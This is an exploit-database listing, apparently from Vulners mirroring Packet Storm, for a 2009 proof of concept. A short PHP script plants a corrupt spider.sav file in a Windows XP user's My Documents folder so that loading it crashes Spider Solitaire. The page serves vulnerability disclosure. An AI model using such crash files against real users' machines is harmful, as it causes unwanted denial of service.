Lucene search
+L

Spider Solitaire Local Crash

🗓️ 15 Oct 2009 00:00:00Reported by SirGodType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Spider Solitaire Local Crash PoC, corrupt save file causes local crash, username variable, copy file to My Document

Code
`<?php  
/*  
Spider Solitaire (Windows XP SP2) Local Crash PoC  
By SirGod  
www.insecurity.ro  
www.twitter.com/SirGod  
Loading a corrupt save file(spider.sav) will result in a local crash  
of Spider Solitaire  
*/  
$username="pwn"; //Replace with your computer username  
$file="spider.sav";  
$junk="Spider Solitaire Local Crash";  
$handle = fopen($file, 'w') or die("Can't create file");  
fwrite($handle,$junk);  
fclose($handle);  
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";  
if(!copy($file,$file2))  
{  
die("Can't copy file");  
}  
else  
{  
echo "File succesfully copied.Open Spider Solitaire and load the  
last saved game";  
};  
?>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Oct 2009 00:00Current
7.4High risk
Vulners AI Score7.4
21